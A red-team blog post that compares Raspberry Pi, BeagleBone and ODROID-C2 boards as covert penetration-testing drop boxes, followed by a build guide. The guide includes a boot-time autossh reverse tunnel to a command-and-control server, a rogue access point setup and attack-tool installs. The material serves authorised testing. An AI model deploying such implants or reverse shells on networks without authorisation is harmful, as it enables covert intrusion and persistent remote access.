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# How to Build Your Own Penetration Testing Drop Box

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# TL;DR

I compared three single-board computers (SBC) against each other with a specific goal of finding which one would serve best as a "penetration testing drop box", and maintain an overall price of around \$110. Spoiler Alert: At the time I tested these Hardkernel's ODROID-C2 absolutely destroyed the competition in this space. If you want to skip the SBC comparison and jump right to building your own pentest drop box you can find the instructions below and also here.

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# Overview

A few weeks ago I was scheduled for an upcoming Red Team exercise for a retail organization. In preparation for that assessment I started gathering all the gear I might need to properly infiltrate the organization, and gain access to their network. Social engineering attacks were explicitly removed from the scope for this engagement. This meant I wasn't going to be able ask any employees to plug in USB devices, let me in certain rooms, or allow me to "check my email" on their terminals (yes this works).

Essentially, what were left at that point were physical attacks. Could I get access to a terminal left unlocked and perform a HID-based (think Rubber Ducky) attack? If the system wasn't unlocked, perhaps a USB-Ethernet adapter (like the LAN Turtle) could be placed in line with the system to give me a remote shell to work from. Even if I could get physical access, without any prior knowledge of the network's egress filtering setup, was I going to be able to get a shell out of the network? So this led me down the path of building a pentest drop box that I could place on a network, could command over a wireless adapter, automatically SSH out of a network, and just be an all-around pentesting box.

# Some Device Requirements

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Looking into the available options already out there it is very clear that I could either spend over \$1,000 to buy something that did what I needed it to do, or try to build one comparable for significantly cheaper. So I set some very specific goals of what I wanted this device to do. Here they are:

- Device has to be relatively unnoticeable in size (could be plugged in under a desk unnoticed)
- Has to be able to be controlled over a wireless interface (bonus points if multiple wireless interfaces can be used so wireless management and wireless attacks can happen concurrently)
- Persistent reverse SSH tunnel to a command and control server
- Fully functional pentesting OS (not just a shell to route attacks through)
- Decent storage space (32-64GB)
- Actually be a usable pentesting box that is not sluggish due to hardware restrictions
- Cost around \$110 total to build

# A Look At the Hardware

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I bought three of the most popular single-board computers (SBC) to try to find out which one would be the perfect fit for a pentest drop box that could accomplish my goals. The devices I put to the test are as follows:

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- Raspberry Pi 3 Model B
- BeagleBone Black
- Hardkernel ODROID-C2

Left to Right: The BeagleBone Black, Raspberry Pi 3 Model B, and the ODROID-C2

Let's take a look at the hardware specifications of these devices first.

Given the chart above, the ODROID-C2 has the others beat in the Processor, GPU, RAM, Ethernet speed, and Video categories, not to mention the ability to install an eMMC storage module instead of running off of a microSD card. The BeagleBone Black (BBB) has 4GB of onboard flash storage, and more I/O and peripheral options. The Pi 3 does have a built in Wireless adapter, and costs less than the C2 or BBB. Even though the scale was already tipping in the

direction of the ODROID-C2 I still gave each device equal treatment in terms of testing them out as pentest drop boxes.

In each case I bought additional items to complete each system. I found relatively inexpensive cases for the boards, power supplies, storage cards, and wireless adapters where necessary. The BBB and Pi 3 only support the ability to use a microSD card as storage where the ODROID-C2 supports microSD and eMMC. So in the case of the ODROID-C2 I actually tested both storage mediums.

Raspberry Pi 3 with microSD Card, and ODROID-C2 with eMMC Module

# Operating System

I'm a fan of Kali Linux. I use it on pretty much every pentest I perform. Along with the desktop versions of their distribution they also provide images for a number of ARM devices. Each of the devices I compared have Kali images available for them <a href="here">here</a>.

One could definitely substitute a distribution of choice for their own pentest drop box but I found Kali very easy to install, and familiar given my history with it. In each case it's as simple as writing the image file to an external storage

medium like a microSD or in the case of the ODROID-C2 an eMMC module then attaching it to the device and booting it up.

# Wireless

The Raspberry Pi 3 conveniently has a built-in wireless card. The problem with it is that it doesn't support monitor mode or packet injection. While yes this card can still be used as an access point, which satisfies the goal of managing the device over WiFl, it is unable to perform any wireless attacks.

I found this relatively inexpensive (\$11.99) <u>wireless adapter</u> that does everything I would want it to. This adapter has an RT5370 chipset which supports monitor mode and worked perfectly when injecting packets with Aireplay-ng.

#### RT5370 Chipset Wireless Adapter

Neither the BBB nor the C2 include wireless chips on the devices themselves so a USB wireless adapter was required for them. I used the above adapter along with Hostapd to setup an access point (I include a full walkthrough on setting this up at the end) I could connect to in order to manage the device without physically being connected to it. This adapter works with the Pi 3 as well. If you

want to perform any wireless attacks with the drop box, and opt for the Pi 3, I recommend this adapter.

# Cases and Overall Look

For the BeagleBone Black I bought this <u>black case</u>. I noticed that the device was heating up a bit during heavy testing. For the other two devices I opted for a case that included a case fan.

#### ODROID-C2 Case With Fan

The ODROID-C2 actually doesn't have very many options available in terms of cases. However, the ODROID-C2 is almost an exact replica of the Raspberry Pi 3 in terms of where ports are located on the device. So pretty much any Pi 3 case should work for it (with one small exception that you will see momentarily). For both the Pi 3 and the ODROID-C2 I used this <u>Performance Pro Case</u>. This case includes a case fan that is powered by two of the GPIO pins located on the boards.

There is one problem that comes from using a Raspberry Pi case for an ODROID-C2: the power supply socket is the only thing that doesn't match up perfectly. This is a problem that can easily be solved with a drill.

After drilling the hole in the case, the power adapter fits just fine.

The three devices in their cases.

# Total Hardware Costs

I decided to test each device with a 64 GB SanDisk Extreme MicroSDXC UHS-1 card. This storage amount was something that I personally wanted to have but if you don't need as much storage you can definitely drop the total price by going with a lower storage space. I also tested out an eMMC module for the ODROID-C2. I only tested a 32 GB eMMC module due to the cost being so much higher. You will see later on in this post that the cost is very much worth it. Again, the wireless card for the Pi 3 is not completely necessary due to the built-in card but if you want to do any wireless attacks you will need an adapter.

# Field Testing the Drop Boxes

After getting each device setup with my initial requirements of what I wanted from a pentest drop box I performed a few tests to compare how well they actually function as a drop box. I first tested how fast each system could boot up. To do this I timed from the moment I hit enter after typing 'reboot' in a terminal to the moment when the login screen was displayed. I also tested how fast from a reboot I could load the Metasploit console. The ODROID-C2 took 1 minute and 14 seconds from reboot to Metasploit console. This was a full minute faster than the Raspberry Pi 3, and over 2 minutes faster than the BeagleBone Black.

Next, I baselined password cracking speeds on the devices. Granted, I don't think I would ever have a need or really want to do any cracking on these. I have a decent cracking rig I could always send hashes to. This was more a test of the processors in each of them so that I could have a number to visually see which one was operating faster. To do this I simply used the baseline test functionality from John the Ripper (./john –test). Again, the ODROID-C2 came out on top, and by a lot.

I performed port scans with each device using Nmap against a router. I tested both the standard Nmap command without any flags and also with the Service Detection flag (-sV). There really wasn't a huge difference between the devices

during this test. They all took around 2 seconds for the basic scan, and around 2 minutes and 23 seconds for the Service Detection.

The last comparison I did between the devices was to see how fast each of them could write data to storage, and read data from storage. To do this I first used 'dd' to write 1 GB of data to disk. Then, I cleared the Linux cache and read the file in again using 'dd'. I also tested buffered and cached reads using 'hdparm'. When it comes to disk reads and writes this is where the ODROID-C2 absolutely destroys the competition. The ODROID-C2 with the eMMC module is about 15 times faster at writing to disk than the Raspberry Pi 3 with microSD and about 9 times faster at reading data. Even the ODROID-C2 with microSD is still about 2 times faster than the Raspberry Pi 3.

For testing write speeds I used this:

```
sync; dd if=/dev/zero of=tempfile bs=1M count=1024; sync
```

For testing read speeds I used this:

```
/sbin/sysctl -w vm.drop_caches=3
dd if=tempfile of=/dev/null bs=1M count 1024
```

For testing buffered and cached reads I used this:

```
hdparm -Tt /dev/mmcblk0
```

# Conclusion

The ODROID-C2 was a much faster and stable build as a pentest drop box. I ended up taking that device with me on the red team engagement, placed it in a location connected to their network and left it up for three days without a hiccup. The wireless interface saved me, as the network I was plugged into wasn't setup to hand out DHCP addresses to new devices. I had to manually discover what the subnet was and manually set an IP address to use to route my traffic. If I didn't have the wireless interface the device would have simply been sitting there not able to connect out to my command and control server.

The ODROID-C2 kept an SSH tunnel to my C2 server up after I setup the interface. The device handled multiple Meterpreter sessions perfectly, and felt as if I had very decent penetration testing system on their network. The other devices were usable but for about the same price you can build a much more powerful drop box.

Below you will find a full walkthrough guide to build an ODROID-C2 pentest drop box w/ eMMC yourself. But if you read this and already have one of the other devices or just feel like building a drop box out of one of the other devices, I have written up instructions for each. You can find PDF's of each write-up here:

- ODROID-C2 w/ eMMC Pentest Drop Box Instructions
- ODROID-C2 w/ microSD Pentest Drop Box Instructions
- Raspberry Pi 3 Pentest Drop Box Instructions
- BeagleBone Black Pentest Drop Box Instructions

Without further ado here is the full walkthrough guide for building the ODROID-C2 Pentest Drop Box with an eMMC module:

# ODROID-C2 w/ eMMC Pentest Drop Box Instructions

## Hardware Shopping List (links current as of 8/2/2016)

- ODroid-C2 \$41.95
- DC 5V/2A 2.5 mm power adapter \$6.99
- 32 GB eMMC module for ODROID-C2 (make sure the eMMC to MicroSD adapter is selected as an add-on \$1) \$42.95

- MicroSD to USB Adapter \$6.99
- RT5370 Chipset Wireless Antenna \$11.99
- Performance Pro Case for RPi \$9.99

## **Initial Setup of the Kali Image**

- Download the Kali ODROID-C2 image from the Kali downloads site <u>here</u>:
- Flash the Kali image to the eMMC.

#### For Windows

- Use an eMMC to microSD adapter, then microSD to USB adapter and connect the eMMC to the Windows system.
- On a Windows system unzip the kali-\*-odroidc2.img.xz file with 7zip
- Use Win32DiskImager to write the Kali image to the eMMC.

#### For Linux

- Use an eMMC to microSD adapter, then microSD to USB Adapter and connect the eMMC to the Linux system.
- Use the dd tool to image the Kali file to the eMMC (It is very important that you choose the correct storage device here. It is very easy to accidentally wipe out your computers hard disk using this command. In the example below I use /dev/sdb but yours may be different so change accordingly.)

xzcat kali-\*-odroidc2.img.xz | dd of=/dev/sdb bs=512k

- Fix eMMC reboot Issue (For some reason the ulnitrd file in the boot partition gets corrupted after rebooting. This is a known issue and is documented here: https://github.com/offensive-security/kali-arm-build-scripts/issues/76. The steps below are a workaround that seems to fix this issue for now.)
  - While eMMC is still plugged into system copy off the /boot partition (Image, meson64 odroidc2.dtb, and ulnitrd).

- Create a "backup" folder in the /boot partition and copy these files there (Image, meson64\_odroidc2.dtb, and ulnitrd).
- Insert the eMMC card into the ODROID-C2 and boot it up using the power supply, an HDMI cable for display, and keyboard/mouse plugged into the USB ports.
- Login to the Kali Linux distribution with the username of 'root' and the password of 'toor'.
- Mount the boot partition and also make it auto mount on start up using /etc/fstab.

```
mount /dev/mmcblk0p1 /boot
echo '/dev/mmcblk0p1 /boot auto defaults 0 0' >> /etc/fstab
```

• Create the backup restore script.

```
nano /boot/backup/restore.sh
```

Copy the following into /boot/backup/restore.sh

#!/bin/bash
cp /boot/backup/\* /boot/

• Make the script executable and make sure it runs without error.

chmod 755 /boot/backup/restore.sh
/boot/backup/restore.sh

• Add the script to the rc.local.

nano /etc/rc.local

Add the following line before 'exit 0'.

/boot/backup/restore.sh

- Plug an Ethernet cable in to the ODROID-C2 to provide Internet to the device. The ODROID-C2 should automatically attempt to obtain an IP address via DHCP.
- Change the root password. This can be accomplished by opening up a terminal and typing 'passwd' then hitting 'enter'. Follow the dialog to change

the password.

```
passwd
```

• Expand the filesystem to cover the entire eMMC. (When the image is flashed to the eMMC it only partitions a portion of the eMMC. You must manually recreate the partition using the below fdisk commands to expand the drive. Run 'df –H' before and after to see the difference in the root partition's available space)

```
fdisk /dev/mmcblk0

d ###The 'd' option allows us to delete a partition

2 ###We select partition 2 to be deleted

n ###The 'n' option creates a new partition

p ###'p' creates a primary partition

2 ###Set partition number 2

Accept default First sector ###The start sector of the disk

Accept default Last sector ###The end sector of the disk

w ###Use 'w' to write the changes

reboot ###reboot, then log back in

resize2fs /dev/mmcblk0p2 ###Use resize2fs to grow the partition
```

• Update and upgrade the Kali distribution.

apt-get update && upgrade

## **Setup a WiFi Access Point**

• Install hostapd.

apt-get install hostapd

• Create the file /etc/hostapd/hostapd.conf. This can be accomplished with the 'nano' command.

nano /etc/hostapd/hostapd.conf

• Copy the following into the hostapd.conf file. Modify the ssid, and wpa\_passphrase accordingly.

# Interface configuration
interface=wlan0
ssid=tortugas
channel=1

```
# WPA configuration
macaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
wpa=3
wpa_passphrase=@pirateslife4me@
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP TKIP
rsn_pairwise=CCMP
# Hardware configuration
driver=nl80211
ieee80211n=1
hw_mode=g
```

• Modify the file /etc/init.d/hostapd.

```
nano /etc/init.d/hostapd
```

Find the line:

```
DAEMON_CONF=
```

And change it to:

```
DAEMON_CONF=/etc/hostapd/hostapd.conf
```

• Install Dnsmasq.

```
apt-get install dnsmasq
```

• Edit /etc/dnsmasq.conf.

```
nano /etc/dnsmasq.conf
```

Add the following to /etc/dnsmasq.conf (This will specify dnsmasq to bind to the wlan0 interface and provide DHCP to clients. The range specified below will hand out IP's in the 172.16.66.50-172.16.66.100 range):

```
no-resolv

# Interface to bind to

interface=wlan0

bind-interfaces
```

```
# Specify starting_range,end_range,lease_time

dhcp-range=172.16.66.50,172.16.66.100,255.255.255.0,12h
```

• Edit /etc/network/interfaces.

nano /etc/network/interfaces

• Add the following to /etc/network/interfaces (This will specify a static IP of 172.16.66.1 for the wlan0 interface).

```
auto wlan0
allow-hotplug wlan0
iface wlan0 inet static
address 172.16.66.1
netmask 255.255.255.0
```

At this point plug in the Wireless adapter, and attempt to bring up the interface.

```
airmon-ng check kill
hostapd /etc/hostapd/hostapd.conf
```

If there are no errors you should now be able to connect to the SSID with a wireless device.

• Enable hostapd to start on boot.

update-rc.d hostapd enable

 Enable dnsmasq to start on boot. (I had issues with "update-rc.d dnsmasq enable" here because dnsmasq was starting before wlan0 was up and failing to bind to the interface. Instead I found adding "service dnsmasq start" to /etc/rc.local works.

nano /etc/rc.local

Add the following line to /etc/rc.local before 'exit 0':

service dnsmasq start

### **Setup Automatic Reverse SSH Tunnel**

This section assumes you have a command and control server accessible on the Internet and that server has SSH enabled on port 22. • Install 'autossh' to use to automatically create an SSH tunnel to a command and control server.

```
apt-get install autossh
```

Generate SSH keys.

```
#Leave all of the settings default
```

• Copy /root/.ssh/id\_rsa.pub to the C2 server.

```
scp /root/.ssh/id_rsa.pub root@<C2 IP Address>:
/directory/to/upload/to/
```

 Append the contents of id\_rsa.pub to ~/.ssh/authorized\_keys or create this file on the C2 server.

```
# On C2 server

cat /directory/to/upload/to/id_rsa.pub >>
    ~/.ssh/authorized_keys
```

• Test the key-based authentication. If all goes well you should end up logged into the C2 server without the requirement of entering a password.

```
# On the ODROID-C2
ssh root@<C2 IP address>
```

• Test 'autossh'.

```
autossh -M 11166 -o "PubkeyAuthentication=yes" -o
"PasswordAuthentication=no" -i /root/.ssh/id_rsa -R 6667:
localhost:22 root@<C2 IP Address>
```

If all goes well an ssh session should be established, and port 6667 should now be listening on the C2 server. On the C2 server SSH'ing to this port should provide an SSH shell to the ODROID-C2. The -M option (11166) is a monitor port.

 Add the 'autossh' command to /etc/rc.local to establish the SSH tunnel at boot.

```
nano /etc/rc.local
```

Add the following to /etc/rc.local

```
autossh -M 11166 -N -f -o "PubkeyAuthentication=yes" -o
"PasswordAuthentication=no" -i /root/.ssh/id_rsa -R 6667:
localhost:22 root@<C2 IP Address> &
```

### Flag meanings:

- -N: Do not execute a command on the middleman machine
- -f: drop in the background
- &: Execute this command but do not wait for output or an exit code. If this is not added, your machine might hang at boot.

#### **Final Touches**

Some tools are pre-installed on the Kali ARM image but not many (sqlmap, wireshark, nmap, hydra, john, aircrack-ng are installed by default)

• Install whatever tools you want to have on your dropbox. Here are some to get you started:

apt-get install responder metasploit-framework macchanger voiphopper snmpcheck onesixtyone patator isr-evilgrade creddump screen

• To go into "Wireless attack" mode instead of using the card as an access point follow these instructions:

```
service hostapd stop
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon ### Or any other wireless attack toolkit...
```

• Optionally, it is possible to connect a second wireless card to use as the "attack" interface.

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